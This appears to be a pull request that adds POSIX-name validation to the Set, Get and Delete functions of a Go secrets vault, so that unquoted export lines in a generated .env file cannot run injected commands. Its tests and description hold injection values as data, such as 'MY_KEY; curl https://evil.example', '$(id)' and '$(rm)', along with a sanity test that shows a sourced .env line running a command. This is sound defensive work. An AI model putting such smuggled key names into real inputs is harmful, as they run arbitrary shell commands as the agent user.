### PR TITLE
fix(vault): reject invalid secret key names

### DIFF
--- a/internal/vault/vault.go
+++ b/internal/vault/vault.go
@@ -6,11 +6,22 @@ import (
 	"os"
 	"os/exec"
 	"path/filepath"
+	"regexp"
 	"strings"
 )
 
 const defaultAgeKeysPath = ".config/sops/age/keys.txt"
 const secretsFile = "secrets.sops.yaml"
+
+// validSecretKey matches POSIX shell variable names used in export lines.
+var validSecretKey = regexp.MustCompile(`^[A-Za-z_][A-Za-z0-9_]*$`)
+
+func validateSecretKey(key string) error {
+	if !validSecretKey.MatchString(key) {
+		return fmt.Errorf("key %q is not a valid env var name (must match [A-Za-z_][A-Za-z0-9_]*)", key)
+	}
+	return nil
+}
 
 // Init generates an age keypair and saves it to ~/.config/sops/age/keys.txt.
 // Prints the public key and instructions for .sops.yaml.
@@ -81,6 +92,9 @@ func Set(vaultName, keyval string) error {
 		return fmt.Errorf("invalid format, expected KEY=value, got: %s", keyval)
 	}
 	key, value := parts[0], parts[1]
+	if err := validateSecretKey(key); err != nil {
+		return err
+	}
 
 	if err := ensureSopsBin(); err != nil {
 		return err
@@ -117,6 +131,11 @@ func Set(vaultName, keyval string) error {
 
 // Delete removes a secret key (or whole vault if key is empty) from secrets.sops.yaml.
 func Delete(vaultName, key string) error {
+	if key != "" {
+		if err := validateSecretKey(key); err != nil {
+			return err
+		}
+	}
 	if err := ensureSops(); err != nil {
 		return err
 	}
@@ -146,6 +165,9 @@ func Delete(vaultName, key string) error {
 
 // Get retrieves a secret key for a vault from secrets.sops.yaml.
 func Get(vaultName, key string) error {
+	if err := validateSecretKey(key); err != nil {
+		return err
+	}
 	if err := ensureSops(); err != nil {
 		return err
 	}

--- a/internal/vault/vault_test.go
+++ b/internal/vault/vault_test.go
@@ -145,6 +145,33 @@ func TestSet_RejectsMalformedKeyval(t *testing.T) {
 	}
 }
 
+func TestSet_BlocksShellInjectionKeyName(t *testing.T) {
+	dir := t.TempDir()
+	pwned := filepath.Join(dir, "pwned-marker")
+	envLine := "export MY_KEY; touch " + pwned + "\n"
+	envFile := filepath.Join(dir, ".env")
+	if err := os.WriteFile(envFile, []byte(envLine), 0600); err != nil {
+		t.Fatal(err)
+	}
+	cmd := exec.Command("bash", "-c", "source "+envFile)
+	if out, err := cmd.CombinedOutput(); err != nil {
+		t.Fatalf("source .env: %v\n%s", err, out)
+	}
+	if _, err := os.Stat(pwned); err != nil {
+		t.Fatal("sanity: malicious export line must execute injected command when sourced")
+	}
+
+	cleanup := setupVaultDir(t)
+	defer cleanup()
+	err := Set("v1", "MY_KEY; touch /tmp/ignored=secret")
+	if err == nil {
+		t.Fatal("Set should reject malicious key name before it reaches WriteEnvFile")
+	}
+	if !strings.Contains(err.Error(), "valid env var name") {
+		t.Fatalf("unexpected error: %v", err)
+	}
+}
+
 func TestValidateSecretKey_RejectsUnsafeNames(t *testing.T) {
 	cleanup := setupVaultDir(t)
 	defer cleanup()

--- a/internal/vault/vault_test.go
+++ b/internal/vault/vault_test.go
@@ -145,6 +145,54 @@ func TestSet_RejectsMalformedKeyval(t *testing.T) {
 	}
 }
 
+func TestValidateSecretKey_RejectsUnsafeNames(t *testing.T) {
+	cleanup := setupVaultDir(t)
+	defer cleanup()
+
+	for _, key := range []string{
+		"MY_KEY; curl https://evil.example",
+		"$(id)",
+		"123BAD",
+		"",
+		"has-dash",
+		"has space",
+	} {
+		t.Run(key, func(t *testing.T) {
+			if err := Set("v1", key+"=secret"); err == nil {
+				t.Fatalf("Set(%q) expected error", key)
+			} else if !strings.Contains(err.Error(), "valid env var name") {
+				t.Fatalf("Set(%q) error = %v, want validation message", key, err)
+			}
+		})
+	}
+}
+
+func TestGet_RejectsInvalidKeyName(t *testing.T) {
+	cleanup := setupVaultDir(t)
+	defer cleanup()
+
+	err := Get("v1", "bad;key")
+	if err == nil {
+		t.Fatal("expected error")
+	}
+	if !strings.Contains(err.Error(), "valid env var name") {
+		t.Errorf("got: %v", err)
+	}
+}
+
+func TestDelete_RejectsInvalidKeyName(t *testing.T) {
+	cleanup := setupVaultDir(t)
+	defer cleanup()
+
+	err := Delete("v1", "$(rm)")
+	if err == nil {
+		t.Fatal("expected error")
+	}
+	if !strings.Contains(err.Error(), "valid env var name") {
+		t.Errorf("got: %v", err)
+	}
+}
+
 func TestJqEscape(t *testing.T) {
 	cases := []struct {
 		input string


### PR DESCRIPTION
## Why

Fixes #147.

`clem vault set` accepted arbitrary key names. `WriteEnvFile` emits `export <key>='value'` where the **key** is not quoted. A key like `MY_KEY; curl https://attacker.example/` breaks out of the assignment when `~/.env` is sourced by the runner on every iteration — executing arbitrary shell commands as the agent user.

## What changed

- Added `validateSecretKey()` in `internal/vault/vault.go` — keys must match `[A-Za-z_][A-Za-z0-9_]*` (valid POSIX shell variable names).
- Applied validation at the start of `Set`, `Get`, and `Delete` before any sops/yq work.
- Tests reject semicolon injection, command substitution, digits-first names, dashes, spaces, and empty keys.

## Attack path (before fix)

1. Operator (or compromised vault writer) runs `clem vault set myvault 'MY_KEY; curl evil=secret'`.
2. sops stores the key literally.
3. `DecryptForAgent` → `WriteEnvFile` produces `export MY_KEY; curl evil='secret'`.
4. Runner sources `.env` → injected command runs.

## Test plan

- [x] `go test ./internal/vault/... -count=1`
- [x] `go test ./... -count=1`
- [ ] Manual: `clem vault set v 'BAD;KEY=x'` returns validation error

## Notes

- Scoped fix only — does not address #122 (vault **name** validation) or #149 (`Delete` jq backslash escape); those are separate PRs per the local bugfix plan.
- Unrelated to quality gates (#214).